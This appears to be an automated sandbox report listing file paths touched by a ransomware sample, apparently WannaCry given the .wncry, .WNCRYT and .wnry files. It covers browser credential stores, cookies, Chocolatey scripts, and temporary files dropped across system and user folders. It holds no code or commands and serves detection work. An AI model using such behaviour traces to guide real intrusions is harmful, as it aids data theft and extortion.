file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1
file: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1
file: C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png
file: C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\user.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif
file: C:\Users\Public\Music\Sample Music\Kalimba.mp3
file: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
file: C:\Users\Public\Music\Sample Music\Sleep Away.mp3
file: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
file: C:\Users\user\AppData\Local\IconCache.db
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js
file: C:\Users\All Users\Boxstarter\BoxStarter.bat
file: C:\Users\All Users\Boxstarter\NOTICE.txt
file: C:\Users\All Users\Boxstarter\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\LICENSE.txt
file: C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat
file: C:\Users\All Users\chocolatey\bin\_processed.txt
file: C:\Users\All Users\chocolatey\config\chocolatey.config.backup
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1
file: C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1
file: C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1
file: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1
file: C:\Users\All Users\chocolatey\tools\checksum.license.txt
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt
file: C:\ba69bdf0a250e352360c33\netfx_Full.mzz
file: C:\Users\user\AppData\Roaming\tor\key-pinning-entries
file: ['eula.rtf.wncry']
file: ['455.WNCRYT']
file: ['thumbcache_sr.db']
file: ['398.WNCRYT']
file: ['405.WNCRYT']
file: ['counters.dat']
file: ['thumbcache_96.db']
file: ['454.WNCRYT']
file: ['t.wnry']
file: ['408.WNCRYT']
file: ['thumbcache_256.db']
file: ['397.WNCRYT']
file: ['00000000.res']
file: ['eula.rtf.wncry']
file: ['456.WNCRYT']
file: ['402.WNCRYT']
file: ['thumbcache_32.db']
file: ['409.WNCRYT']
file: ['thumbcache_1024.db']
file: ['520.WNCRYT']
file: ['403.WNCRYT']
file: ['407.WNCRYT']
file: ['c.wnry']
file: ['thumbcache_idx.db']
Creates a hidden or system file
file: C:\Users\user\Desktop\~SD7362.tmp
file: C:\Users\user\Documents\~SD73C1.tmp
file: C:\Users\user\Documents\WindowsPowerShell\~SD73E1.tmp
file: C:\Users\Default\Desktop\~SD73F2.tmp
file: C:\Users\Default User\Desktop\~SD7412.tmp
file: C:\Users\Public\Desktop\~SD7432.tmp
file: C:\Users\Default\Documents\~SD7443.tmp
file: C:\Users\Default User\Documents\~SD7454.tmp
file: C:\Users\Public\Documents\~SD7464.tmp
file: C:\~SD7475.tmp
file: C:\$Recycle.Bin\~SD7486.tmp
file: C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\~SD74A6.tmp
file: C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD74B6.tmp
file: C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\~SD74D7.tmp
file: C:\ba69bdf0a250e352360c33\~SD74E7.tmp
file: C:\ba69bdf0a250e352360c33\1025\~SD7508.tmp
file: C:\ba69bdf0a250e352360c33\1028\~SD7566.tmp
file: C:\ba69bdf0a250e352360c33\1029\~SD7596.tmp
file: C:\ba69bdf0a250e352360c33\1030\~SD75B6.tmp
file: C:\ba69bdf0a250e352360c33\1031\~SD75E6.tmp
file: C:\ba69bdf0a250e352360c33\1032\~SD7616.tmp
file: C:\ba69bdf0a250e352360c33\1033\~SD7627.tmp
file: C:\ba69bdf0a250e352360c33\1035\~SD7637.tmp
file: C:\ba69bdf0a250e352360c33\1036\~SD7638.tmp
file: C:\ba69bdf0a250e352360c33\1037\~SD7649.tmp
file: C:\ba69bdf0a250e352360c33\1038\~SD765A.tmp
file: C:\ba69bdf0a250e352360c33\1040\~SD767A.tmp
file: C:\ba69bdf0a250e352360c33\1041\~SD767B.tmp
file: C:\ba69bdf0a250e352360c33\1042\~SD767C.tmp
file: C:\ba69bdf0a250e352360c33\1043\~SD768D.tmp
file: C:\ba69bdf0a250e352360c33\1044\~SD768E.tmp
file: C:\ba69bdf0a250e352360c33\1045\~SD769E.tmp
file: C:\ba69bdf0a250e352360c33\1046\~SD76BE.tmp
file: C:\ba69bdf0a250e352360c33\1049\~SD76CF.tmp
file: C:\ba69bdf0a250e352360c33\1053\~SD76E0.tmp
file: C:\ba69bdf0a250e352360c33\1055\~SD771F.tmp
file: C:\ba69bdf0a250e352360c33\2052\~SD776E.tmp
file: C:\ba69bdf0a250e352360c33\2070\~SD77DD.tmp
file: C:\ba69bdf0a250e352360c33\3082\~SD781C.tmp
file: C:\ba69bdf0a250e352360c33\Graphics\~SD783C.tmp
file: C:\ba69bdf0a250e352360c33\NetFx45\~SD783D.tmp
file: C:\ba69bdf0a250e352360c33\NetFx451\~SD783E.tmp
file: C:\ba69bdf0a250e352360c33\NetFx452\~SD784F.tmp
file: C:\ba69bdf0a250e352360c33\NetFx46\~SD7850.tmp
file: C:\ba69bdf0a250e352360c33\NetFx461\~SD7851.tmp
file: C:\ba69bdf0a250e352360c33\NetFx462\~SD7862.tmp
file: C:\ba69bdf0a250e352360c33\NetFx47\~SD7863.tmp
file: C:\ba69bdf0a250e352360c33\NetFx471\~SD7864.tmp
file: C:\ba69bdf0a250e352360c33\NetFx472\~SD7865.tmp
file: C:\Boot\~SD7866.tmp
file: C:\Boot\cs-CZ\~SD7867.tmp
file: C:\Boot\da-DK\~SD7868.tmp
file: C:\Boot\de-DE\~SD7869.tmp
file: C:\Boot\el-GR\~SD786A.tmp
file: C:\Boot\en-US\~SD787A.tmp
file: C:\Boot\es-ES\~SD787B.tmp
file: C:\Boot\fi-FI\~SD787C.tmp
file: C:\Boot\Fonts\~SD787D.tmp
file: C:\Boot\fr-FR\~SD787E.tmp
file: C:\Boot\hu-HU\~SD787F.tmp
file: C:\Boot\it-IT\~SD7880.tmp
file: C:\Boot\ja-JP\~SD7881.tmp
file: C:\Boot\ko-KR\~SD7882.tmp
file: C:\Boot\nb-NO\~SD7893.tmp
file: C:\Boot\nl-NL\~SD7894.tmp
file: C:\Boot\pl-PL\~SD7895.tmp
file: C:\Boot\pt-BR\~SD7896.tmp
file: C:\Boot\pt-PT\~SD7897.tmp
file: C:\Boot\ru-RU\~SD7898.tmp
file: C:\Boot\sv-SE\~SD7899.tmp
file: C:\Boot\tr-TR\~SD78AA.tmp
file: C:\Boot\zh-CN\~SD78AB.tmp
file: C:\Boot\zh-HK\~SD78AC.tmp
file: C:\Boot\zh-TW\~SD78AD.tmp
file: C:\PerfLogs\~SD78AE.tmp
file: C:\PerfLogs\Admin\~SD78AF.tmp
file: C:\PSTranscripts\~SD78B0.tmp
file: C:\PSTranscripts\20251206\~SD78B1.tmp
file: C:\Recovery\~SD78C1.tmp
file: C:\Recovery\a2711f19-5f87-11ed-b233-de933b2797ae\~SD78C2.tmp
file: C:\Sysmon\~SD78C3.tmp
file: C:\Users\~SD78D4.tmp
file: C:\Users\All Users\~SD78D5.tmp
file: C:\Users\All Users\Adobe\~SD78D6.tmp
file: C:\Users\All Users\Adobe\ARM\~SD78D7.tmp
file: C:\Users\All Users\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SD78E7.tmp
file: C:\Users\All Users\Adobe\Setup\~SD78F8.tmp
file: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\~SD78F9.tmp
file: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\~SD78FA.tmp
file: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\Transforms\~SD78FB.tmp
file: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\~SD790C.tmp
file: C:\Users\All Users\Boxstarter\~SD790D.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\~SD790E.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\~SD790F.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\~SD791F.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\~SD7920.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\~SD7941.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\~SD7942.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\~SD7943.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\~SD7953.tmp
file: C:\Users\All Users\Boxstarter\BuildPackages\~SD7954.tmp
file: C:\Users\All Users\chocolatey\~SD7955.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\~SD7966.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\7zip.22.1\~SD7976.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\7zip.install.22.1\~SD7977.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\adobereader.2022.003.20263\~SD7978.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\autohotkey.install.1.1.35.00\~SD7979.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\boxstarter.3.0.0\~SD797A.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\boxstarter.bootstrapper.3.0.0\~SD797B.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\boxstarter.chocolatey.3.0.0\~SD797C.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.Common.3.0.0\~SD798D.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\Boxstarter.HyperV.3.0.0\~SD798E.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.WinConfig.3.0.0\~SD798F.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-compatibility.extension.1.0.0\~SD7990.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-core.extension.1.4.0\~SD79A1.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-dotnetfx.extension.1.0.1\~SD79A2.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-windowsupdate.extension.1.0.5\~SD79A3.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet-5.0-runtime.5.0.13\~SD79A4.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet-6.0-runtime.6.0.1\~SD79B4.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.5.0.13\~SD79B5.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.6.0.1\~SD79B6.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet.5.0.13\~SD79B7.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet.6.0.1\~SD79B8.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnetfx.4.8.0.20190930\~SD79B9.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\Firefox.106.0.5\~SD79CA.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\GoogleChrome.107.0.5304.88\~SD79CB.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\jre8.8.0.351\~SD79CC.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB2919355.1.0.20160915\~SD79CD.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB2919442.1.0.20160915\~SD79CE.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB2999226.1.0.20181019\~SD79CF.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB3033929.1.0.5\~SD79D0.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB3035131.1.0.3\~SD79D1.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB3063858.1.0.0\~SD79D2.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB3118401.1.0.5\~SD79D3.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\OfficeProPlus2013.15.0.4827\~SD79E4.tmp
